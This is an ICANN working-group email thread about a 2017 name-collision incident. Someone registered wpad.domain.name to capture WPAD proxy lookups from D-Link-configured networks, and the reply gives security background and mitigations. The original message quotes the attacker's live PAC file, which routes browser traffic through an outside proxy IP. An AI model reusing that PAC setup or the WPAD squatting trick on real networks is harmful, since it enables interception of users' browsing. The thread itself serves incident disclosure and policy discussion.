<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=us-ascii">
<meta name="Generator" content="Microsoft Word 15 (filtered medium)">
<style><!--
/* Font Definitions */
@font-face
{font-family:"Cambria Math";
panose-1:2 4 5 3 5 4 6 3 2 4;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;}
@font-face
{font-family:Menlo;
panose-1:0 0 0 0 0 0 0 0 0 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0in;
margin-bottom:.0001pt;
font-size:11.0pt;
font-family:"Calibri",sans-serif;}
a:link, span.MsoHyperlink
{mso-style-priority:99;
color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{mso-style-priority:99;
color:purple;
text-decoration:underline;}
p.msonormal0, li.msonormal0, div.msonormal0
{mso-style-name:msonormal;
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
font-size:11.0pt;
font-family:"Calibri",sans-serif;}
span.apple-tab-span
{mso-style-name:apple-tab-span;}
span.EmailStyle19
{mso-style-type:personal-reply;
font-family:"Calibri",sans-serif;
color:windowtext;}
.MsoChpDefault
{mso-style-type:export-only;
font-size:10.0pt;}
@page WordSection1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]-->
</head>
<body lang="EN-US" link="blue" vlink="purple">
<div class="WordSection1">
<p class="MsoNormal"><a name="_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">Rubens thanks for bringing this up, I thought I would share some background information on this issue with
this group.<o:p></o:p></span></a></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">We have heard reports where D-Link routers append domain.name to Web Proxy Auto-Discovery
Protocol (WPAD) resolution requests. RFC 1535, from 1993, effectively outlines <b>this</b> security issue and makes recommendations to mitigate it. Individual security experts from organizations such as Google and Verisign have provided commentary [slprocessing]
on the risks and nuances caused by interactions with Domain Name System (DNS) search list processing in new and existing domain names (at any point in the label space). Additionally, the Internet Corporation for Assigned Names and Numbers (ICANN) Security
and Stability Advisory Committee (SSAC) has warned about the risks of such DNS search list processing for years now, and has outlined the behavior in SAC064 [sac064], SSAC Advisory on DNS “Search List” Processing. <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">In addition to the above, there are a large array of risks when networked devices use service
discovery protocols such as WPAD, DNS Service Discovery (DNS-SD), and Intra-Site Automatic Tunnel Address Protocol (ISATAP). If these are not properly configured, they can be easily exploited. The security community, national CERTs [cert-wpad], ICANN, and
Verisign [vrsn-wpad] have warned about these risks for some time now. With more devices connected to the internet attempting “zero configuration” solutions for ease of deployment, and more adversaries searching for easily compromised devices, it is paramount
that developers and manufacturers heed these warnings and ship their systems with secure configurations, and that network administrators ensure proper IT hygiene with these devices. The Internet Society and Online Trust Alliance’s efforts [ota-trust] in this
area are but one example of advice that network administrators and developers alike should be aware of.<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">There are some triage-level benefits inherent in protections offered by delegated top level
domains (TLDs) versus undelegated TLDs, as outlined in [apples], as well as some related benefits provided by DNS Security Extensions (DNSSEC) in delegated TLDs. However, the attack surface is far larger than just at an authoritative name server/registry.
These specific attack vectors can be exploited at any point in the label space, in both delegated and undelegated TLDs, in intermediate (e.g., recursive name server, on the wire man in the middle, etc.), and authoritative levels of the DNS.
<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">Proper configurations [sac064] and solutions such as DNSSEC’s cryptographic protections should
be employed to minimize the potential for these attacks to be effectively exploited by an attacker. It is imperative that network administrators have awareness and visibility into this problem, and to directly address its actual causes instead of perennially
triaging them through controls that only address symptoms of the problem (i.e., registration block lists, reserved names, etc. on authoritative name servers and/or registries are best used only as stop-gap solutions while operators, system administrators,
and software engineers address the actual cause: end-system confusion over their use of namespaces, and improper search list configurations).
<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">Verisign’s security team has expressly contacted D-Link regarding this issue but has no further
comment on the matter.<o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[rfc1535] </span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://www.ietf.org/rfc/rfc1535.txt"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://www.ietf.org/rfc/rfc1535.txt</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[slprocessing] </span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://forum.icann.org/lists/comments-name-collision-05aug13/msg00060.html"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://forum.icann.org/lists/comments-name-collision-05aug13/msg00060.html</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[sac064] </span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://www.icann.org/en/system/files/files/sac-064-en.pdf"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://www.icann.org/en/system/files/files/sac-064-en.pdf</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[ota-trust] </span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://otalliance.org/news-events/press-releases/ota-releases-iot-trust-framework"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://otalliance.org/news-events/press-releases/ota-releases-iot-trust-framework</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[apples] </span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://forum.icann.org/lists/comments-name-collision-05aug13/pdfwMG5QF57h3.pdf"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://forum.icann.org/lists/comments-name-collision-05aug13/pdfwMG5QF57h3.pdf</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[cert-wpad] </span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://www.us-cert.gov/ncas/alerts/TA16-144A"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://www.us-cert.gov/ncas/alerts/TA16-144A</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"> <o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%">[vrsn-wpad] </span></span><span style="mso-bookmark:_MailEndCompose"></span><a href="https://www.verisign.com/en_US/internet-technology-news/cert-alert/index.xhtml"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><span style="color:windowtext">https://www.verisign.com/en_US/internet-technology-news/cert-alert/index.xhtml</span></span></span><span style="mso-bookmark:_MailEndCompose"></span></a><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p></o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><span style="color:#0D0D0D;mso-style-textfill-fill-color:#0D0D0D;mso-style-textfill-fill-alpha:100.0%"><o:p> </o:p></span></span></p>
<p class="MsoNormal"><span style="mso-bookmark:_MailEndCompose"><o:p> </o:p></span></p>
<span style="mso-bookmark:_MailEndCompose"></span>
<div>
<div style="border:none;border-top:solid #E1E1E1 1.0pt;padding:3.0pt 0in 0in 0in">
<p class="MsoNormal"><b>From:</b> gnso-newgtld-wg-wt4-bounces@icann.org [mailto:gnso-newgtld-wg-wt4-bounces@icann.org]
<b>On Behalf Of </b>Rubens Kuhl<br>
<b>Sent:</b> Thursday, September 28, 2017 1:42 PM<br>
<b>To:</b> gnso-newgtld-wg-wt4@icann.org<br>
<b>Subject:</b> [EXTERNAL] [Gnso-newgtld-wg-wt4] Ongoing name collision incident<o:p></o:p></p>
</div>
</div>
<p class="MsoNormal"><o:p> </o:p></p>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal">Nothing like real life experience to base policy discussions: there is an ongoing name collision incident in a legacy gTLD. <o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal">D-Link routers have a default parameter given to local networks the suffix domain.name ; so, names without a full domain name get appended domain.name for its queries. <o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal">Microsoft operating systems query for the string "wpad" to determine local proxy servers of an organisation. <o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal">.name is a registry where a domain is required to be first.last.name , with two labels. <o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal">So... someone registered wpad.domain.name and is now taking over browsing traffic for the affected users, which can be in the order of millions but are least in the thousands. <o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal">For live view of the redirection process:<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><a href="https://gwhois.org/wpad.domain.name+dns">https://gwhois.org/wpad.domain.name+dns</a><o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal"><a href="http://wpad.domain.name/wpad.dat">http://wpad.domain.name/wpad.dat</a> will return the list of proxy servers under attacker control. <o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal">(It currently returns this:<o:p></o:p></p>
</div>
<div>
<div>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:"Menlo",serif">function FindProxyForURL(url, host) {<o:p></o:p></span></p>
</div>
<div>
<p class="MsoNormal"><span class="apple-tab-span"><span style="font-size:8.5pt;font-family:"Menlo",serif">
</span></span><span style="font-size:8.5pt;font-family:"Menlo",serif">return 'PROXY 185.82.212.95:8080; DIRECT'; <o:p></o:p></span></p>
</div>
<div>
<p class="MsoNormal"><span style="font-size:8.5pt;font-family:"Menlo",serif">}<o:p></o:p></span></p>
</div>
</div>
<div>
<p class="MsoNormal">)<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><br>
<br>
<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><br>
<br>
<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal">Policy question for the item "name collisions in legacy gTLDs" is whether contracted parties should be obliged to act in a certain way under similar circumstances. <o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
<div>
<p class="MsoNormal">Rubens<o:p></o:p></p>
</div>
<div>
<p class="MsoNormal"><o:p> </o:p></p>
</div>
</div>
</body>
</html>